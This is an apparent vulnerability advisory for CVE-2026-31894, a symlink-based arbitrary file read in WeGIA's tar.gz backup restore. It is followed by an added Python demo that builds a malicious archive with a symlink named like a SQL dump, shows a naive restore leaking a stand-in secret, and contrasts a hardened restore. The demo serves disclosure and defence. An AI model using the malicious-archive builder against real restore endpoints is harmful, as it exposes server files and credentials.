Unrated severity · NVD Advisory · Published Mar 11, 2026 · Updated Mar 12, 2026
WeGIA affected by arbitrary file read via symlink in backup restore
CVE-2026-31894
Description
WeGIA is a web manager for charitable institutions. In version 3.6.5, the patched loadBackupDB() extracts tar.gz archives to a temporary directory using PHP's PharData class, then uses glob() and file_get_contents() to read SQL files from the extracted contents. Neither the extraction nor the file reading validates whether archive members are symbolic links, so an archive member that is a symlink named like a SQL dump is followed by file_get_contents(), which reads the link's target on the server instead of the dump (arbitrary file read). This vulnerability is fixed in 3.6.6.
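The mechanism described above, as an added example that is neither WeGIA's code nor part of the advisory: a Python re-creation of the restore flow (the project's routine is PHP and uses PharData, which is not used here). It builds a tar.gz whose only member is a symlink named like a SQL dump, shows that an extractor which materialises the symlink followed by a glob-and-read loop returns the contents of the link target, and shows the check a hardened restore needs: refuse link members (and names that escape the extraction directory) before extracting anything, and afterwards read only regular, non-link files that resolve inside that directory. The dump name backup.sql, the secret.txt file standing in for a server-side file, and its DB_PASSWORD line are constructed for the demo.

```python
import glob
import io
import os
import tarfile
import tempfile

# Constructed for the demo (not WeGIA's naming): the SQL dump name the restore
# routine globs for. WeGIA's real filename convention is not given on the page.
DUMP_NAME = "backup.sql"


def build_malicious_backup(archive_path: str, link_target: str) -> None:
    """Write a tar.gz whose only member is a symlink named like a SQL dump.

    A symlink member carries no data, only the link target, so the archive is
    tiny and the file it points at is read on the victim, not the attacker.
    """
    with tarfile.open(archive_path, "w:gz") as tar:
        info = tarfile.TarInfo(DUMP_NAME)
        info.type = tarfile.SYMTYPE
        info.linkname = link_target
        tar.addfile(info)


def build_benign_backup(archive_path: str, sql_text: str) -> None:
    """Write a legitimate tar.gz holding a regular-file SQL dump."""
    data = sql_text.encode("utf-8")
    with tarfile.open(archive_path, "w:gz") as tar:
        info = tarfile.TarInfo(DUMP_NAME)
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))


def read_sql_files(workdir: str, check: bool) -> str:
    """Glob for *.sql and concatenate their contents (the vulnerable read when
    check is False; refuses links and paths resolving outside workdir when True)."""
    root = os.path.realpath(workdir)
    parts = []
    for sql in sorted(glob.glob(os.path.join(workdir, "*.sql"))):
        if check and (os.path.islink(sql)
                      or not os.path.realpath(sql).startswith(root + os.sep)):
            raise ValueError(f"refusing to read {sql}: link or outside {root}")
        with open(sql, "r", encoding="utf-8") as fh:
            parts.append(fh.read())
    return "".join(parts)


def naive_restore(archive_path: str, workdir: str) -> str:
    """Vulnerable flow: extract without inspecting member types, then glob and read.
    The loop materialises symlink members with os.symlink, as a symlink-unaware
    extractor does; the subsequent read follows the link to its target."""
    with tarfile.open(archive_path, "r:gz") as tar:
        for member in tar:
            dest = os.path.join(workdir, member.name)
            if member.issym():
                os.symlink(member.linkname, dest)
            elif member.isfile():
                with open(dest, "wb") as fh:
                    fh.write(tar.extractfile(member).read())
    return read_sql_files(workdir, check=False)


def unsafe_members(archive_path: str) -> list:
    """Members a hardened restore must refuse: hard/symbolic links, absolute
    names, names that climb out of the extraction directory, other odd types."""
    bad = []
    with tarfile.open(archive_path, "r:gz") as tar:
        for member in tar:
            name = os.path.normpath(member.name)
            if member.issym() or member.islnk():
                bad.append((member.name, "link member"))
            elif os.path.isabs(name) or name.startswith(".."):
                bad.append((member.name, "path escapes extraction dir"))
            elif not (member.isfile() or member.isdir()):
                bad.append((member.name, "unexpected member type"))
    return bad


def safe_restore(archive_path: str, workdir: str) -> str:
    """Hardened flow: reject the whole archive if any member is unsafe, extract
    only regular files, then read with the link/containment check enabled."""
    bad = unsafe_members(archive_path)
    if bad:
        raise ValueError(f"refusing archive: {bad}")
    with tarfile.open(archive_path, "r:gz") as tar:
        for member in tar:
            if member.isfile():
                dest = os.path.join(workdir, os.path.normpath(member.name))
                os.makedirs(os.path.dirname(dest), exist_ok=True)
                with open(dest, "wb") as fh:
                    fh.write(tar.extractfile(member).read())
    return read_sql_files(workdir, check=True)


def demo() -> dict:
    """Run both restores in a scratch directory and report what each yielded."""
    result = {}
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.txt")  # stands in for e.g. config.php
        with open(secret, "w", encoding="utf-8") as fh:
            fh.write("DB_PASSWORD=hunter2\n")  # constructed secret
        evil, good = os.path.join(tmp, "evil.tar.gz"), os.path.join(tmp, "good.tar.gz")
        build_malicious_backup(evil, secret)
        build_benign_backup(good, "INSERT INTO t VALUES (1);\n")
        for d in ("w1", "w2", "w3"):
            os.makedirs(os.path.join(tmp, d))
        result["leaked"] = naive_restore(evil, os.path.join(tmp, "w1"))
        try:
            safe_restore(evil, os.path.join(tmp, "w2"))
            result["refused"] = False
        except ValueError:
            result["refused"] = True
        result["reasons"] = unsafe_members(evil)
        result["benign"] = safe_restore(good, os.path.join(tmp, "w3"))
    return result


if __name__ == "__main__":
    print(demo())
```

The two checks are deliberately separate: the pre-extraction scan stops the archive before anything touches disk, and the post-extraction realpath/islink test is defence in depth for cases the scan cannot see, such as a symlinked parent directory already present in the temporary location.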
Affected products
- Range: >= 3.6.5, < 3.6.6
Patches
No patches discovered yet.
References
- github.com/LabRedesCefetRJ/WeGIA/commit/79e7a164eddb527e3b331037b7a4defb8c115d50 (MISC)
- github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6mmm-27h8-8g55 (CONFIRM)